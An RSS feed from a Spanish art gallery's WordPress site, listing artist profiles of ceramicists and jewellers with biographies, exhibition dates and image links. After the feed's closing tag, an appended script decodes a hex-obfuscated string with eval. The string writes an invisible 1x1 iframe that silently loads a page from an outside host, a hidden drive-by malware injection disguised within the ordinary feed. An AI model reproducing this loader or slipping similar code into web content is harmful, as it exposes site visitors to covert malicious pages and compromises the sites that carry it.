<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Galería Cuatrodiecisiete &#187; Cerámica</title>
	<atom:link href="http://www.cuatrodiecisiete.com/categoria/ceramica/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cuatrodiecisiete.com</link>
	<description>Escultura Pintura Fotografía Dibujo Cerámica</description>
	<lastBuildDate>Fri, 09 Apr 2010 14:49:38 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>GÁMEZ, Silvia</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/04/silvia-gamez/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/04/silvia-gamez/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 15:22:30 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=490</guid>
		<description><![CDATA[Compagina su trabajo de arquitecto con la joyería y técnicas afines que le lleva a realizar cursos de Orfebrería en la escuela de Artes y Oficios de Madrid, así como otros muchos cursos monográficos sobre otras técnicas. ]]></description>
			<content:encoded><![CDATA[<p>Compagina su trabajo de arquitecto con la joyería y técnicas afines que le llevan a realizar cursos de Orfebrería en la escuela de Artes y Oficios de Madrid, así como otros muchos cursos monográficos sobre otras técnicas. Durante varios años ha colaborado como diseñadora con empresas dedicadas a este campo.</p>
<p><strong>Broche-colgante y Sortijas</strong>. Cristal de Murano, inclusiones en plata, aventurina termofundida, coral y piedras.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/broches-y-sortijas.jpg" alt="Broche/Colgante y Sortijas. Plata y piedras." /></p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/broches-2007.jpg" alt="Broche. Cristal de murano y plata" /></p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/10/dido-colgante-6.jpg" alt="COLGANTE 6. Cristal de Murano con inclusiones de Aventurina termofundida." style="margin-right: 17px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/10/dido-colgante-2.jpg" alt="COLGANTE 2. Cristal de Murano con inclusiones de Aventurina termofundida." style="margin-right: 17px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/10/colgante-1.jpg" alt="COLGANTE 3. Cristal de Murano con inclusiones en plata termofundida." /></p>
<p><strong>Pendientes</strong>. Cristal de Murano, plata y coral.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/pendientes.jpg" alt="Pendientes plata, piedras y crital." style="margin-right: 1px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/pendientes-1_miniatura-1.jpg" alt="Pendientes plata" style="margin-right: 1px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/pendiente-plata_miniatura.jpg" alt="Pendiente plata" /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/04/silvia-gamez/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GÓMEZ, Carmen</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/04/carmen-gomez-2/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/04/carmen-gomez-2/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 14:37:50 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=619</guid>
		<description><![CDATA[De formación autodidacta, desde 1994 se dedica a la creación de joyería de autor. La cerámica es el material protagonista de sus composiciones. ]]></description>
			<content:encoded><![CDATA[<h2 class="post_subtit">RegalArte 07</h2>
<p>(11 diciembre- 5 enero 2008)</p>
<p>De formación autodidacta, desde 1994 se dedica a la creación de joyería de autor.Trabaja fundamentalmente con cerámica, manejando una gran variedad de texturas y colores. Su estilo es muchas veces arriesgado, por su forma y por la composición, al utilizar materiales como el terciopelo, el cristal, los elásticos o el lino. Desde 1996 expone en galerías de arte y en ferias de joyería, diseño y moda. </p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/ceramica-pintada-a-mano-2.jpg" alt="Colgante y Broche. Cerámica pintada." /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/04/carmen-gomez-2/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>LEACH, Simon</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/05/simon-leach/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/05/simon-leach/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 16:47:44 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=304</guid>
		<description><![CDATA[A caballo entre el peso que supone la herencia familiar y la búsqueda del anonimato, Simon Leach busca un punto en el que el valor de sus piezas radique en ellas mismas y, sobre todo, trata de poner al alcance de cualquiera artesanía en estado puro.]]></description>
			<content:encoded><![CDATA[<p>Nacido en St. Ives Cornwall (Inglaterra) en 1956, recibió formación académica como ingeniero en Westland Helicopters. Posteriormente recibió formación cerámica profesional en el estudio de su padre, David Leach adentrándose en el uso del gres y la porcelana.<br />
En 1990 decide instalar su estudio en España especializándose en esmaltes de baja temperatura “Sacados al rojo” (inspirados por la cerámica Raku). Sin embargo, con el tiempo, retomará el gres y la porcelana en su nuevo taller (donde además ha habilitado un lugar para exposición y venta directa al público). A caballo entre el peso que supone la herencia familiar y la búsqueda del anonimato, Simon busca un punto en el que el valor de sus piezas radique en ellas mismas y, sobre todo, trata de poner al alcance de cualquiera artesanía en estado puro. </p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/3_bol_gres_esmalte_tenmoku.jpg" alt="Bol_gres_Esmalte_tenmoku" /></p>
<p align="center">Bol gres golpeado con motivos en relieve. Esmalte tenmoku / Bol con cortes. Gres blanco con decoración esmalte tenmoku / Bol gres con cortes horizontales. Esmalte tenmoku.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/05/simon-leach/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ESCALONA, Marina</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/05/marina-escalona/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/05/marina-escalona/#comments</comments>
		<pubDate>Fri, 05 Feb 2010 16:59:35 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=541</guid>
		<description><![CDATA[Licenciada en Bellas Artes por la Universidad Complutense de Madrid, especialidad en pintura y pedagogía del dibujo. ]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/11/marina-escalona_broche-cora.jpg" alt="MARINA ESCALONA. Broche. T.M. sobre fieltro." style="float: left; margin: 0px 16px 10px 0px; cursor: pointer" /><br />
<strong>Sobre su trayectoria…</strong> Marina Escalona (Pamplona, 1966) es licenciada en Bellas Artes por la Universidad Complutense de Madrid, especialidad en pintura y pedagogía del dibujo. En 1996 recibe una Beca del Gobierno Foral de Navarra.<br />
Ha participado en diferentes exposiciones colectivas e individuales: Sala Hispano 20 de Pamplona. 1997; Salas del Deuch Banck de Madrid y Frankfurt. 2000; Fundación Caixa Castellón. Ajuntament D´Onda. 2001; Galería Lor de Pamplona. 2002; Galería Aguado, Logroño. 2000, 2002 y 2006.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/medallones.jpg" alt="Transferencia y pintura acrílica sobre plata." /></p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/05/marina-escalona/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>GARCÉS, Fernando</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/04/fernando-garces/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/04/fernando-garces/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 15:57:37 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=306</guid>
		<description><![CDATA[De líneas depuradas, volúmenes nítidos y sintéticos, su obra surge del conocimiento y dominio de la técnica, para transmitir una expresión contenida en el silencio de sus formas.]]></description>
			<content:encoded><![CDATA[<p>De líneas depuradas, volúmenes nítidos y sintéticos, su obra surge del conocimiento y dominio de la técnica, para transmitir una expresión contenida en el silencio de sus formas.</p>
<p><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/gres-y-porcelana.jpg" alt="gres-y-porcelana" /></p>
<p>Todas estas piezas están realizadas en el torno de alfarero en porcelana, una pasta que pese a su dificultades de trabajo en el torno, ofrece unas calidades de blancura, translucidez, tacto, sonoridad &#8230;..dificilmente alcanzables con otros materiales. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/04/fernando-garces/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>SARMIENTO, José Antonio</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/10/jose-antonio-sarmiento/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/10/jose-antonio-sarmiento/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 16:40:25 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=263</guid>
		<description><![CDATA[Es conocido internacionalmente en el ámbito de la cerámica como especialista en la cocción con leña, manejando hornos de alta temperatura conocidos como Anagama y Noborigama.]]></description>
			<content:encoded><![CDATA[<h2 class="post_subtit">Reversibles</h2>
<p>( 27 marzo &#8211; 14 abril 2008)</p>
<p><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/016_grande.jpg" alt="016_grande" style="float: left; margin: 0px 16px 10px 0px; cursor: pointer" /> <strong>Sobre su trayectoria&#8230;</strong> <strong>José Antonio Sarmiento</strong> (León, 1956) es conocido internacionalmente en el ámbito de la cerámica contemporánea como especialista en la cocción con leña, manejando hornos de alta temperatura conocidos como Anagama y Noborigama. </p>
<p>El contacto y estímulo de la práctica artística que recibió desde la infancia le llevaron a través del dibujo, la pintura y el modelado en arcilla, hasta la cerámica en la que encuentra otros elementos con los que desarrollar su gusto personal por los materiales humildes.</p>
<p>Desde 1980 trabaja a tiempo completo con el barro y el fuego, y tras realizar grandes murales, se interesa por cierta alfarería concentrándose en la búsqueda de la auténtica vida de la vasija, cuestionando las fronteras de las disciplinas artísticas desde una visión heterodoxa. En 1988 construye su primer horno noborigama coincidiendo con el traslado de su taller-estudio a San Cibrián de Ardón (León). En 1999 el prestigioso artista <strong>Ryoji Koie</strong> se convierte en su mentor y pone a su disposición el estudio de Kamiyahagi (Japón). En el año 2000, nada más regresar de Japón, José Antonio Sarmiento diseña y construye su propio horno anagama-noborigama.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/017-y-018.jpg" alt="017-y-018" /></p>
<p align="center"><strong>Bandeja (Shihozara) Nº 4</strong>. 5&#215;34x30 cm. Gres, óxido, esmalte y marcas de conchas.</p>
<p><strong>Sobre su obra&#8230;</strong> Sarmiento se somete a la restricción de la escala doméstica, alimentando la materia con la misma sabia que alimenta todo el cuerpo de sus obras: las piezas para la mesa, como las obras de gran escala (alfarería escultórica) en las que viene trabajando sin descanso desde 1980, son ramas del mismo tronco; es decir, sirven a su naturaleza utilitaria manteniendo su personal concepción escultórica.</p>
<p>Supera las reglas que la tradición occidental marca en esta disciplina, dentro de los cánones de perfección o imperfección, simetría y uniformidad y se dirige por otros caminos. La austeridad, la intuición, la sutileza que apreciamos en las “Cerámicas útiles” de José Antonio Sarmiento nos remite a una concepción estética que reconoce su inspiración en las fuentes de la naturaleza, en los conocimientos de la cerámica japonesa.</p>
<p>El cocer con leña, o el sacar la pieza al rojo cuando trabaja con gas, le permite seguir actuando sobre la obra también en esa fase del proceso. En su obra el fuego y cómo es aplicado, además de procedimiento para dar consistencia al material, es acción de intervención directa en el soporte de arcilla a la que otorga una dedicación eminente e inseparable del proceso creativo completo.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/10/jose-antonio-sarmiento/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>BOFILL, María / CASTAÑO, Eva / COLLELL, Carme / MADOLA / SARMIENTO, José Antonio</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/10/maria-bofill-eva-castano-carme-collel-madola-jose-antonio-sarmiento/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/10/maria-bofill-eva-castano-carme-collel-madola-jose-antonio-sarmiento/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 16:09:07 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=243</guid>
		<description><![CDATA[Madola utiliza para sus trabajos la tierra refractaria, María Bofill se situa entre el clasicismo y la ruptura contemporánea, J.A.Sarmiento se centra en el tema de la vasija sin renunciar por ello a la mirada escultórica, Carmen Collell presenta en su obra las tonalidades del Mediterráneo y Eva Castaño cuyos objetos encierran dentro de sí pequeños microcosmos.]]></description>
			<content:encoded><![CDATA[<h2 class="post_subtit">Aproximaciones al paisaje</h2>
<p>(24 junio &#8211; 22 de julio de 2007)</p>
<p>Diferentes propuestas PICTÓRICAS figurativas (ver sección pintura) y otros tantos trabajos CERÁMICOS de doce artistas, que nos aportan una particular visión del paisaje.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/eva-castano_bol.jpg" alt="Eva CASTAÑO. Cuenco. Porcelana y esmaltes." style="margin-right: 30px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/mbofillnubes.jpg" alt="María BOFILL. Nubes. Porcelana" style="margin-right: 30px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/sarmiento_paisajes_del-para.jpg" alt="J.A. SARMIENTO. Paisajes del páramo. Gres, óxido y ceniza." /></p>
<p align="center">Eva Castaño. Cuenco. 9,5 x 7cm. Porcelana y esmaltes.</p>
<p align="center">María Bofill. Nubes. 10 x 40 x 60cm. Porcelana en reducción.</p>
<p align="center">José Antonio Sarmiento. Paisaje del páramo. 53cm. Gres, óxido y ceniza.</p>
<p>El paisaje está presente como fuente de inspiración en la obra <strong>CERÁMICA</strong> de <strong>Madola</strong> (Barcelona, 1944) que utiliza desde 1965 para sus trabajos la tierra refractaria, <strong>María Bofill</strong> (Barcelona, 1937) cuyas piezas sin función alguna muestran una búsqueda entre el clasicismo y la ruptura contemporánea, <strong>José Antonio Sarmiento</strong> (León, 1956) ante la necesidad de integrar el arte en la vida se centra en el tema de la vasija sin renunciar por ello a la mirada escultórica, <strong>Carmen Collell</strong> (Vic, 1951) en cuyas piezas está presente las tonalidades de su entorno: la tierra, el campo, el azul del cielo, los reflejos de la luz del Mediterráneo y <strong>Eva Castaño</strong> (Madrid, 1964) cuyos objetos que encierran dentro de sí pequeños microcosmos o paisajes.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/carme-collell_rosa-cubica-r.jpg" alt="Carme COLLELL. Rosa Cúbica" style="margin-right: 8px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/mb-12.jpg" alt="María BOFILL" style="margin-right: 8px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/09/madola_urnes.jpg" alt="MADOLA. Urna XVI" /></p>
<p align="center">Carme Collell. Rosa Cúbica I. 24 x 24 x 19cm. Arcilla con engobes bruñidos.</p>
<p align="center">María Bofill. 8,5 x 23cm. Porcelana en reducción.</p>
<p align="center">Madola. Urna XVI. 22 x 22 x 13cm. Arcilla refractaria, esmaltes, engobes y óxidos.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/10/maria-bofill-eva-castano-carme-collel-madola-jose-antonio-sarmiento/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ORIZA, María</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/04/oriza-maria/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/04/oriza-maria/#comments</comments>
		<pubDate>Thu, 04 Feb 2010 10:00:09 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=594</guid>
		<description><![CDATA[Estudia en la Escuela de Cerámica Francisco Alcántara. Posteriormente acude a los talleres libres en el Círculo de Bellas Artes y durante tres años asiste en la escuela de la Moncloa a los talleres de Joan Manuel Yacer y Aurora Cañero.]]></description>
			<content:encoded><![CDATA[<p>Estudia en la Escuela de Cerámica Francisco Alcántara. Posteriormente permanece tres años en la escuela de la Moncloa asistiendo a los talleres de Joan Manuel Yacer y Aurora Cañero. Paralelamente acude a una academia de pintura y a los talleres libres en el Círculo de Bellas Artes. En el 94 realiza con Pere Noguera un monográfico.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/uploads/2010/02/Arquitectura-del-deseo.jpg" alt="Arquitectura del deseo. Gres" title="Arquitectura del deseo. Gres" width="600" height="152" class="alignnone size-full wp-image-1535" /></p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/uploads/2010/02/MARÍA-ORIZA-WEB.jpg" alt="Flor del pensamiento. Filtro de sueños. Filtro vertical. Gres y óxido." title="Flor del pensamiento. Filtro de sueños. Filtro vertical. Gres y óxido." width="600" height="152" class="alignnone size-full wp-image-1527" /></p>
<p>Técnica:  Gres con óxidos. </p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/04/oriza-maria/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>CASTAÑO, Eva</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/11/eva-castano/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/11/eva-castano/#comments</comments>
		<pubDate>Thu, 11 Feb 2010 10:00:32 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=585</guid>
		<description><![CDATA[Se interesa desde niña por la música y las artes plásticas, decantándose más tarde por la pintura y la cerámica. La pintora Begoña Izquierdo es quien la inicia en el dibujo y la pintura, creando una base fundamental para su posterior trabajo de ceramista. ]]></description>
			<content:encoded><![CDATA[<h2 class="post_subtit">RegalArte 07</h2>
<p>(11 diciembre &#8211; 5 enero 2008)</p>
<p><strong>Sobre su trayectoria…</strong> Eva Castaño (Madrid, 1964) se interesa desde niña por la música y las artes plásticas, decantándose más tarde por la pintura y la cerámica. La pintora Begoña Izquierdo (Bilbao 1926-Madrid 1999), amiga y maestra, es quien la inicia en el dibujo y la pintura, creando una base fundamental para su posterior trabajo de ceramista. Estudia en la Escuela de Cerámica. (Madrid, 1982-1987).</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/pareja-de-vasos-en-gres-8x.jpg" alt="Pareja de vasos. Gres. 8×9,8 cm. 20 Ej." style="margin-right: 10px" /><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/cuenco-gres-12-x-95-cm.jpg" alt="Cuenco. Gres. 12×9,5 cm" /></p>
<p><strong>Técnica</strong>: Gres torneado y faceteado.</p>
<p>Certámenes: Villa de Madrid, Caja de Madrid (1995,1996), Certamen Nacional, Ciudad de Alcorcón (1988), M.A.P.A.(1988). Exposiciones colectivas: Galería Cuatro Diecisiete, Raquel Ponce de Madrid, Casa de Cultura de San Lorenzo del Escorial y C.C. Buenavista de Madrid, Sala de exposiciones Antonio Machado de Leganés, C.C. Caleidoscopio de Móstoles, Palais Fervaques, Saint- Quentin, Francia y CERCO 2006 (Zaragoza). Exposiciones individuales: Espacio 2001 Mercado Puerta de Toledo, Escuela de Arte Francisco Alcántara (Madrid 1998) y Fundación Paideia, Aravaca, (Madrid, 1999) Primer premio de Cerámica Muestra Cultural de la Casa del Reloj, Madrid, 1989.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/3-vasos_porcelana_75x8_10x.jpg" alt="Vasos. Porcelana. 7,5×8 cm / 10×8,5 cm / 9×8,5 cm" /></p>
<p><strong>Técnica</strong>: Porcelana torneada y faceteada.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/11/eva-castano/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ASPERILLA, María</title>
		<link>http://www.cuatrodiecisiete.com/2010/02/10/maria-asperilla/</link>
		<comments>http://www.cuatrodiecisiete.com/2010/02/10/maria-asperilla/#comments</comments>
		<pubDate>Wed, 10 Feb 2010 17:00:11 +0000</pubDate>
		<dc:creator>Mónica Menor</dc:creator>
				<category><![CDATA[Cerámica]]></category>

		<guid isPermaLink="false">http://www.cuatrodiecisiete.com/?p=605</guid>
		<description><![CDATA[Entre 2001 y 2006 cursa la Enseñanza Estructurada de la ecm* (Escuela de Cerámica de la Moncloa), convirtiendo la cerámica en un medio muy familiar para su expresión artística.]]></description>
			<content:encoded><![CDATA[<h2 class="post_subtit">RegalArte 08</h2>
<p>( 11 diciembre &#8211; 5 enero 2009)</p>
<p><strong>Sobre su trayectoria…</strong> Su primer contacto con el barro en sus clases extraescolares de cerámica acaban llevándola entre 2001 y 2006 a cursar la Enseñanza Estructurada de la ecm* (Escuela de Cerámica de la Moncloa), convirtiendo la cerámica en un medio muy familiar para su expresión artística.</p>
<p align="center"><img src="http://www.cuatrodiecisiete.com/wp/wp-content/media/2007/12/web.jpg" alt="Porcelana colada, esmaltada y decorada al tercer fuego." /></p>
<p>Desde entonces participado en exposiciones colectivas de diversa índole y su obra ha sido seleccionada en algunas ocasiones (Concurso Anual A.A.P.P. Ayto. Majadahonda,Premio Cerámica M.A.P.A.). En 2006 disfrutó de una estancia en Greenwich House Pottery y pudo realizar su obra en el marco más urbano posible: Nueva York. Actualmente trabaja junto con Lydia de Santisteban en un nuevo proyecto: las paredes hablan.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.cuatrodiecisiete.com/2010/02/10/maria-asperilla/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f636173746c6f61642e636f6d2f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>

